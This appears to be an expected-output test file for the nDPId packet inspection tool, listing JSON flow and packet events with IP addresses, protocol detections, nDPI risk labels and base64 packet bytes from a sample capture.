+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 02158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLXL+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Ktlu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":707,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":707,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vyCP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEfGu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRygtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4XaV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7580000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 